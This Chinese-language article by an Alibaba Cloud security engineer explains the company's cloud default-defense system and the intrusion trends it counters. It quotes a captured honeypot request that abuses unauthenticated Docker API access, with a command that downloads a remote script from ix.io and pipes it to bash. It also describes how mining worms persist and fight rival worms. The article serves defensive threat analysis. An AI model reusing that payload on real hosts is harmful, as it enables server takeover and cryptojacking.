作者 | 黃曉堃 阿裡雲安全工程師
緻謝 | 吳凡 阿裡雲進階安全工程師,郭偉博 阿裡雲進階安全工程師
責編 | 屠敏
出品 | CSDN(ID:CSDNnews)
随着越來越多企業上雲,我們深刻體會到企業雲化帶來的發展變革,雲原生安全帶來的價值也逐漸明朗起來。阿裡雲作為覆寫全國40%網站的平台,每天承擔着保障雲平台安全的責任,同時将這些原生能力以産品和服務的方式賦能給企業。阿裡雲有一支預設防禦團隊,将“預設安全”進行到底,意味着我們将安全基因植入在雲平台上,讓雲上更安全。阿裡雲安全提供的豐富安全産品和服務讓客戶和雲平台共建,提升整體企業安全水位。
阿裡雲安全預設防禦團隊雙11當日自動識别并攔截來自184個國家發起的60億次攻擊,成功保障雲上租戶業務平穩運作。那麼雲上使用者到底經曆了些什麼?攻擊者又有哪些千變萬化的手段?預設防禦團隊又是怎麼精準識别進行攔截的?下面通過一個例子讓我們一一為大家揭曉。
激烈的攻防對抗
雙11前夜,阿裡雲安全預設防禦團隊在雲上部署的蜜罐捕獲到了這樣一條攻擊封包。攻擊者嘗試使用Docker未授權通路遠端指令執行漏洞來進行攻擊,可以從封包中看到,攻擊者使用iplogger記錄受害者的ip位址,同時向ix.io請求腳本并執行。
POST /v1.24/containers/create HTTP/1.1
User-Agent: Go-http-client/1.1
{"Hostname"......"Cmd":["chroot","/mnt","/bin/sh","-c","curl -4 -s https://iplogger.org/xxxxxx;curl -s -L http://ix.io/xxxx | bash;"],"Image":"alpine".......
跟進這個腳本内容可以發現,其中一部分指令是用來關閉阿裡雲的相關服務以及解除安裝阿裡雲主機端安全産品安騎士的動作,目的性非常明顯,就是為了規避阿裡雲安全的檢測。除此之外,此腳本會向ssh中寫入公鑰以便後續免密登陸、寫入定時任務持續攻擊、關閉常見服務釋放資源、下載下傳挖礦軟體進行牟利、修改DNS解析防止二次入侵等行為。一旦攻擊成功,伺服器除了正常業務受到嚴重影響,甚至所有權也會移向他人之手。預設防禦自動偵測到相關批量攻擊手段和攻擊團夥,在首次攻擊發生時便已成功攔截,保障使用者正常業務平穩度過雙11。
深入洞察攻擊行為
在我們進行日常阿裡雲平台安全保障過程中也發現,攻擊者所使用的攻擊方式越發層出不窮,變化多端。随着對抗技術手段的不斷更新,黑客行為、黑灰産活動也呈現愈發組織化、專業化。
攻擊鍊路
下圖展示的是惡意團夥典型的整個攻擊流程,大部分攻擊者會選擇通用安全漏洞(例如,Windows永恒之藍漏洞等)或者雲上使用較多的元件漏洞(例如Redis未授權通路、Struts2遠端指令執行等)以及暴力破解服務賬号密碼的方式進行攻擊,進而批量擷取雲主機權限執行惡意指令。這些惡意指令一般是從攻擊團夥所屬的伺服器下載下傳惡意腳本或可執行檔案,然後運作。惡意腳本一般包含三部分功能:通信維持C&C子產品(用于後續DDoS、腳本更新或其他指令)、挖礦子產品、蠕蟲掃描子產品(對外掃描,擴大傳染範圍)。
一切黑灰産和幫派的攻擊都是帶有目的性的,而主要目的就是為了牟利。由于門羅币具備獨有的匿名貨币屬性且對CPU架構有優化,極其适用于雲上主機場景,是以成為了幫派挖礦牟利的首選。
由于攻擊者的收益與受到感染的主機數量直接相關,為了擴大戰果,惡意腳本、惡意木馬的投放更加趨向于蠕蟲化。蠕蟲化的攻擊方式使得惡意程式的傳播能力大幅增強,甚至企業整個内網都可能都淪為挖礦機器,嚴重影響正常業務進行。
互相競争
與正常業務競争一樣,黑灰産之間、惡意團夥之間也存在着互相競争的關系。一台受漏洞影響的雲主機被惡意團夥攻擊成功後,存在着被另一批攻擊者再次攻擊的可能。後者的行為很有可能阻斷前者的财路,是以黑灰産、惡意團夥之間的競争也會在其所使用的惡意程式中展現的淋漓盡緻。一台淪陷了的雲主機往往遭受過多個惡意團夥輪番"摧殘",這也導緻恢複起來更加困難,損失更大。
最常見抑制其他攻擊者的手段便是采用腳本殺死包含特定可疑關鍵字的程序,進而保證"為己所用"。又或是一些攻擊團夥攻擊成功後,會修複自身所利用的漏洞以防止其他攻擊者使用。除此之外,Sinkhole技術也被蠕蟲用于對抗同一主控端上的其他蠕蟲。其原理非常簡單:修改/etc/hosts檔案,将"競争對手"使用的伺服器位址,指向127.0.0.1或0.0.0.0。這樣當其他蠕蟲嘗試從伺服器拉取檔案,或嘗試發送上線資訊時,請求将會被重定向到本機而無法正常發送,進而一勞永逸的遏制競争對手。
打造無感化預設防禦機制
憑借與黑灰産和惡意團夥多年的對抗經驗和技術沉澱,阿裡雲安全預設防禦團隊打造了一套完整的入侵攻擊行為智能攔截機制,來實作雲上租戶的無感化預設防禦。該機制是為了抵禦雲上出現的大規模入侵行為,為雲上使用者提供免費的基礎安全防禦能力,是阿裡雲雲盾的基礎安全防禦子產品。下圖展示的是整個機制的結構示意圖。整體結構分為了三部分,威脅感覺子產品、關聯分析子產品與攔截處罰子產品。
威脅感覺子產品
此子產品能夠通過多種檢測途徑、在攻擊全鍊路上進行威脅感覺。團夥識别單元用于對雲上惡意團夥進行分析識别與持續跟進并關注團夥攻擊方式是否變化,進而及時響應;入侵行為檢測單元主要針對入侵行為産生的異常噪聲進行捕獲,進而及時發現可疑的入侵行為;而異常監控單元所收集的異常告警資料,一般作為輔助資訊與其他資料一起進行分析。
團夥識别
團夥識别對于整個鍊路的攻擊發現與跟進攻擊手段更新有着重要的戰略意義。下圖展示的是整個團夥分析的流程結構圖。分析單元根據全鍊路監控的告警資料,結合威脅情報、Shodan等空間裝置搜尋引擎資料所提供的IOCs(Indicators ofCompromise),通過網絡行為關聯、程序行為模式識别,抽取關聯實體,以圖模型為基礎,建構一張超大規模點邊組成的完整惡意程式行為網絡。之後利用社群發現等圖聚類算法通過對整個行為網絡的資料進行深度挖掘:剝離歸并相同行為特征的簇群為同一團夥,持續追蹤并關注其擴張狀态或手法更新;監控程序狀态,及時清查挖礦程序運作;實時監控中控通信,防止團夥利用僵屍網絡進行大規模DDoS攻擊。
關聯分析子產品
關聯分析子產品是整個機制的處理核心,其主要功能是通過多個次元綜合判斷惡意行為是否為真正的入侵行為,進而決定放行、攔截或進一步動作。由于單點判斷容易引起很高的誤報,是以一般會使用多個層面的結果進行關聯分析,得到最終的判斷。
威脅情報單元主要是通過關聯情報資料來對攻擊鍊路的各個名額進行資訊補充,例如惡意IP、惡意域名、檔案哈希值等;曆史行為單元主要用于關聯惡意攻擊曆史行為資料,嘗試對類似的行為進行歸類合并;指紋提取分析單元針對攻擊類型、攻擊方式提取相應攻擊指紋,用以識别、标記攻擊的手段,同時用以入侵原因的綜合分析;惡意行為分析單元借助AI手段通過多種模型對攻擊手法與告警資料進行智能分析,綜合對整體行為進行黑白性質判定;信譽模型單元主要針對攻擊者、攻擊手段、威脅程度進行畫像評估,傳回不同威脅等級的評判結果;除此之外,還有各種專用、通用的檢測模型對資料進行綜合分析挖掘,進而對整個攻擊行為進行定性。
攔截處罰子產品
當關聯分析子產品确認攻擊行為之後,相關的資料資訊便會發送到攔截處罰子產品進行攻擊攔截,保證雲上正常使用者業務不受攻擊影響。攔截子產品的智能決策中心會對需要攔截的攻擊者、目标做綜合分析,設定合适的攔截機制。同時,為了防止特殊情況造成的影響,智能決策中心會根據具體情況适當延遲處罰時間,觀察後續動作。監控告警平台負責關注機制所有的流程的正常運轉,發現重大事件時,可以第一時間進行通知,進行人工幹預。
結束語
在這套預設防禦機制的保護下,今年雙11期間,阿裡雲平台為使用者自動識别并攔截了來自184個國家的60億次攻擊。安全防禦永遠不可能一勞永逸,讓安全問題離使用者越來越遠是我們一直努力的目标。阿裡雲願與雲上使用者一起,共同協作,保障雲上安全。
更多「問底中國IT技術演進」專題精彩文章:
- 提高 10 倍性能,揭秘淘寶、天貓背後的圖檔存儲如何扛住雙十一巨流?| 問底中國 IT 技術演進
- 抗住 60 億次攻擊,起底阿裡雲安全的演進之路 | 問底中國 IT 技術演進
- 阿裡雲智能開放平台團隊何登成:解碼雲計算的 2B 服務基因 | 問底中國 IT 技術演進
- 阿裡雲安全掌門人肖力:企業上雲,如何保證安全?| 問底中國 IT 技術演進
- 神龍 X-Dragon,這技術“範兒”如何?| 問底中國 IT 技術演進
- 阿裡雲智能 AIoT 首席科學家丁險峰:阿裡全面進軍 IoT 這一年 | 問底中國 IT 技術演進
- 阿裡雲彈性計算負責人蔣林泉:億級場景驅動的技術自研之路 | 問底中國 IT 技術演變